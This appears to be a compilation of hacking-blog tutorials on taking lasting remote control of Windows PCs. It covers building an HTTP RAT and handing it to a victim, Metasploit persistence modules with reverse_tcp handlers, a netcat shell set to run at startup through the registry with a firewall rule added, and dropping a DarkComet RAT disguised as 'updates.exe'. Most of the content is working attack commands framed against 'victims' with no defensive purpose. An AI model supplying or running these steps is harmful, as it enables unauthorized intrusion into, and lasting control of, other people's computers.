HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as an HTTP Tunnel, except it works in the reverse direction. These Trojans are comparatively more dangerous as these work on the web and thus work almost everywhere where you can find internet.

Here, we would be working with HTTP RAT backdoor web server by a zombie

To download the above from internet and extract the tool. It would something like as shown in the pic below

Double click on the folder and click on the icon with httprat written next to it. Something like this pic pops up on the screen.

Click on create. This is what should pop out on screen.

An icon less application with httpserver must be created as in this pic:

Send this file to the victim via pen drive or any other means. Once the victim double clicks on the application, it will automatically send a connection back to you. You just need to type the victim’s IP address on the browser. This is what will come on the screen

Author: Shivam Yadav is a hacking enthusiast, a learner and a researcher in this field. contact here

5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results .Then   run command:

Persistence

run persistence –X –i 10 –p 443 –r 192.168.0.105

-X=connect back when the system boots

-i 10=try to connect back every 10 seconds

-p 443=reverse connection port

-r ip=reverse connection ip

After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 443

set lhost 192.168.0.105

exploit

s4u_persistence

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires ‘Logon as a batch job’ permissions (SeBatchLogonRight)

Now type use exploit/windows/local/s4u_persistence

msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)

msf exploit (s4u_persistence)>set lport 443

msf exploit (s4u_persistence)>set trigger logon

msf exploit (s4u_persistence)>set session 2

msf exploit (s4u_persistence)>exploit

Now after successful backdoor creation, restart the victim pc you can see the previous meterpreter session is closed and then run command:

 use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.137

exploit

VSS_PERSISTENCE

This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique and then background the session .Then run series of commands:

Now type use exploit/windows/local/vss_persistence

msf exploit (vss_persistence)>set runkey true

msf exploit (vss_persistence)>set schtask true

msf exploit (vss_persistence)>set rhost 192.168.222.137

msf exploit vss_persistence)>set session 2

msf exploit (vss_persistence)>exploit 

Now run exploit which will create a backdoor and will give a meterpreter session.

Now background it and use the multi handler and also set the payload with commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4444

exploit

Now restart the victim system and the meterpreter session will die, and then run: exploit after restarting the system it will give a reverse meterpreter shell.

REGISTRY PERSISTENCE

This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in “CurrentVersion\Run” (depending on privilege and selected method). The payload will be installed completely in registry

First background the meterpreter session and then run commands:

Now type use exploit/windows/local/registry_persistence

msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)

msf exploit (registry_persistence)>set lport 4545

msf exploit (registry_persistence)>set startup system

msf exploit (registry_persistence)>set session 1

msf exploit (registry_persistence)>exploit

 Now set up your system for reverse connection. Run the following commands on your msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4545

exploit

 Now restart the victim pc and your previous meterpreter session will die, so now run the exploit: After restarting you will get the reverse meterpreter shell as you can see in my case

NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:

upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

Now set the registry value with the following command:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’

Now get the command shell with command:

Shell and then bypass the firewall on the victim system by adding firewall rules with shell command:

netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

Now check whether the rules are added successfully with the command:

netsh firewall show portopening

As you can see the the firewall rule netcat is added successfully.

Now after restarting of the victim system , run the following command on the terminal:

nc  -nv 192.168.0.101 4445

Here 192.168.0.101 is the victim system you previously created backdoor and 4445 is the port you gave while setting the registry value.

After successful running the command you will get the command shell.

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administer  and help-desk personnel love the feature of accessing computers or laptops remotely but we also know that accessing a computer remotely requires that we have to install the same software on the remote computer as well as on our computer. But Atelier Web Remote Commander (AWRC) is a powerful tool for every geeks and system administrators because it can connect to other computers without installing any software or without any configuration on the remote computer.

Atelier Web Remote Commander (AWRC) Features:

  • Runs across firewalls.
  • Performs deep audits and all kinds of maintenance operations.
  • Does not leave traces on remote. It is absolutely safe.
  • Zero configuration simultaneous connections.

Now let’s see practical working of this tool.

Download Atelier Web Remote Commander from here  and install and open.

In Remote Host column type IP address of the computer or server, you want to get a remote desktop connection, after that give User Name and Password and click on Connect.

After few seconds, you can see that a desktop of a remote computer appears in front of you. Now you can see information of the remote system and access file of the remote computer.

Go to SysInfo tab, here you see all information related to remote computer like version of running OS, BIOS information, details of memory, etc.

In NetworkInfo section, you will get most interesting information about the remote system like routing table, running protocols, open ports, IP statistics, etc.

FileSystem tab will give you access to file system of a remote computer, where you access all files and data on all drives.

UserGroup section will give you details of all created accounts and its privileges and in which group that user account is connected.

If you want to chat or tell something to remote computer user you can also do that, simply start Chat window and type whatever you want to say and hit enter.

OUTPUT of remote victims computer.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist | Technical writer. You can follow him on LinkedIn and Facebook

Hack Remote PC using Darkcomet RAT with Metasploit

Download DarkcometRAT From here after downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe

First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)

In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist

In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal

Now save it on your desktop.

Again open DARKCOMET RAT and select listen to new port option

Now enter the port number used in the form above and click on Listen

Now hack victim’s PC using Metasploit How to Hack Remote PC

Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet

Upload /root/Desktop/updates.exe d:\\

Now type shell to get the command prompt of victim’s PC. And run uploaded exe file

Now you can get the session of victim’s PC. See the screenshot below:

Click on system info you can see the whole system information of victim’s PC